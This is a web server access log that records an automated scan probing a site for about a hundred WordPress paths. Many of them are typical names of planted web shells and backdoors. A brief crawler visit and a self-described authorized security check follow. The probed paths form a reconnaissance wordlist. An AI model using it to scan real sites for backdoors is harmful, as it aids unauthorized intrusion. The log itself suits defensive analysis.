20.194.2.112 - - [08/Sep/2026:17:14:21 +0200] "GET /wp-admin/wp-conflg.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:22 +0200] "GET /wp-includes/ID3/file.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:23 +0200] "GET /wp-includes/autoload_classmap.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:24 +0200] "GET /admin/uploads/ HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:25 +0200] "GET /wp-content/cong.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:27 +0200] "GET /wp-includes/ID3/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:28 +0200] "GET /wp-includes/images/media/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:29 +0200] "GET /wp-admin/admin.php HTTP/1.1" 200 157198 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:30 +0200] "GET /wp-content/languages/chosen.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:32 +0200] "GET /wp-content/plugins/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:33 +0200] "GET /wp-content/uploads/2024/index.php HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:34 +0200] "GET /goods.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:35 +0200] "GET /plugins/ HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:36 +0200] "GET /wp-admin/js/widgets/index.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:38 +0200] "GET /wp-content/themes/wp-pridmag/init.php HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:40 +0200] "GET /cgi-bin/wp-2019.php HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:41 +0200] "GET /wp-admin/setup-config.php HTTP/1.1" 409 2783 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:42 +0200] "GET /wp-content/file.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:43 +0200] "GET /edit.php HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:44 +0200] "GET /file5.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:45 +0200] "GET /wp-includes/images/smilies/index.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:46 +0200] "GET /wp-admin/ HTTP/1.1" 200 157198 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:48 +0200] "GET /wp-includes/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:51 +0200] "GET /aa.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:53 +0200] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:54 +0200] "GET /wp-includes/blocks/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:55 +0200] "GET /wp-content/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:56 +0200] "GET /wp-content/plugins/seoplugins/index.php HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:57 +0200] "GET /.well-known/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:58 +0200] "GET /modules/file.php HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:14:59 +0200] "GET /wp-admin/css/colors/coffee/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:00 +0200] "GET /wp-admin/css/colors/sunrise/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:01 +0200] "GET /autoload_classmap.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:03 +0200] "GET /public/index.php HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:04 +0200] "GET /wp-admin/network/index.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:05 +0200] "GET /wp-content/uploads/2022/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:06 +0200] "GET /wp-content/uploads/json.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:07 +0200] "GET /wp-includes/SimplePie/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:08 +0200] "GET /wp-includes/customize/chosen.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:09 +0200] "GET /wp-includes/shell20211028.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:11 +0200] "GET /index/function.php HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:12 +0200] "GET /wp-admin/css/colors/midnight/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:13 +0200] "GET /wp-content/style-css.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:14 +0200] "GET /wp-includes/Requests/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:15 +0200] "GET /wp-includes/pomo/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:17 +0200] "GET /file.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:18 +0200] "GET /wp-admin/css/colors/light/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:19 +0200] "GET /wp-includes/certificates/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:20 +0200] "GET /wp-admin/css/colors/index.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:22 +0200] "GET /wp-admin/css/colors/blue/about.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:23 +0200] "GET /wp-content/alfa.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:25 +0200] "GET /inputs.php HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:27 +0200] "GET /wp-admin/js/widgets/cloud.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:28 +0200] "GET /wp-content/about.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:29 +0200] "GET /1.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:31 +0200] "GET /admin/controller/extension/extension/ultra.php HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:33 +0200] "GET /wp-admin/images/index.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:35 +0200] "GET /wp-includes/block-supports/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:36 +0200] "GET /wp-content/themes/twentytwenty/404.php HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:37 +0200] "GET /wp-content/upgrade/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:38 +0200] "GET /wp-admin/images/cloud.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:40 +0200] "GET /wp-admin/user/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:41 +0200] "GET /wp-admin/user/chosen.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:43 +0200] "GET /wp-content/admin.php HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:44 +0200] "GET /wp-includes/file.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:45 +0200] "GET /admin/admin.php HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:46 +0200] "GET /wp-includes/assets/index.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:47 +0200] "GET /wp-includes/images/smilies/about.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:48 +0200] "GET /wp-includes/sitemaps/providers/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:49 +0200] "GET /wp-content/themes/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:50 +0200] "GET /wp-includes/block-patterns/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:52 +0200] "GET /aspera/faspex/ HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:55 +0200] "GET /cgi-bin/ HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:58 +0200] "GET /flower.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:15:59 +0200] "GET /wp-admin/js/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:01 +0200] "GET /.well-known/gecko-litespeed.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:02 +0200] "GET /admin/function.php HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:04 +0200] "GET /wp-admin/network/chosen.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:05 +0200] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:06 +0200] "GET /wp-content/uploads/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:08 +0200] "GET /wp-includes/assets/admin.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:09 +0200] "GET /wp-includes/images/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:11 +0200] "GET /.well-known/classwithtostring.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:13 +0200] "GET /anonse/lock360.php HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:15 +0200] "GET /cgi-bin/wp-login.php HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:17 +0200] "GET /wp-admin/css/colors/ectoplasm/wp-login.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:18 +0200] "GET /wp-content/themes/about.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:19 +0200] "GET /wp-content/uploads/2021/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:20 +0200] "GET /wp-includes/html-api/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:21 +0200] "GET /assets/images/doc.php HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:22 +0200] "GET /ioxi-o.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:23 +0200] "GET /radio.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:24 +0200] "GET /wp-admin/js/widgets/about.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:26 +0200] "GET /wp-admin/includes/cloud.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:28 +0200] "GET /wp-admin/includes/index.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:29 +0200] "GET /wp-admin/js/widgets/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:32 +0200] "GET /wp-content/ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:32 +0200] "GET /admin.php HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:37 +0200] "GET /functions.php HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:40 +0200] "GET /modules/ HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:44 +0200] "GET /wp-admin/css/colors/ocean/ HTTP/1.1" 403 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:48 +0200] "GET /admin/upload/ HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.194.2.112 - - [08/Sep/2026:17:16:51 +0200] "GET /ccx/index.php HTTP/1.1" 200 41338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
216.73.216.217 - - [08/Sep/2026:17:28:02 +0200] "GET /robots.txt HTTP/1.1" 304 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.217 - - [08/Sep/2026:17:28:03 +0200] "GET /sitemap.xml HTTP/1.1" 404 41340 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
151.123.177.214 - - [08/Sep/2026:17:29:17 +0200] "GET / HTTP/1.1" 200 41341 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
151.123.177.214 - - [08/Sep/2026:17:29:23 +0200] "GET /wp-json/ HTTP/1.1" 200 41341 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
151.123.177.214 - - [08/Sep/2026:17:29:27 +0200] "GET /?rest_route=/ HTTP/1.1" 200 41341 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
151.123.177.214 - - [08/Sep/2026:17:29:30 +0200] "GET /wp-includes/version.php HTTP/1.1" 403 41341 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
151.123.177.214 - - [08/Sep/2026:17:29:32 +0200] "GET /wp-json/ HTTP/1.1" 200 41341 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
151.123.177.214 - - [08/Sep/2026:17:29:36 +0200] "GET /?rest_route=/ HTTP/1.1" 200 41341 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
